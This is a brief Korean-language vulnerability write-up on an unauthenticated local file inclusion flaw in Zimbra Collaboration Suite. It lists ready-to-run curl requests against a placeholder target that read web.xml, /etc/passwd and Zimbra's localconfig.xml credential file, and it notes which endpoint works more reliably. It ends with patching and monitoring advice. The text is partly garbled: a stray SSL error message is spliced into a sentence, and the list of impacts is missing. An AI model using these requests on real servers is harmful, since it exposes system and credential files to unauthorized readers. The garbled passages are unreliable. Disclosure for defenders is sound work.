
CVE-2025-68645
이 문서는 Zimbra Collaboration Suite에 영향을 미치는 로컬 파일 포함 (LFI) 취약점에 대해 설명합니다.
이 문제는 다음 매개변수의 부적절한 처리에서 발생합니다.
/h/*?javax.servlet.include.servlet_path=
이로 인해 인증되지 않은 사용자가 내부 애플리케이션 리소스에 접근할 수 있습니다.
테스트 요청:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
여러 엔드포인트가 취약한 매개변수를 다르게 처리합니다.
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/rest에 비해 더 나은 응답 신뢰성SSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
성공적인 익스플로잇은 다음으로 이어질 수 있습니다:
Zimbra를 패치된 버전으로 업데이트
취약한 엔드포인트에 대한 접근 제한
의심스러운 매개변수에 대한 로그 모니터링:
javax.servlet.include.servlet_path악성 패턴을 차단하는 WAF 규칙 배포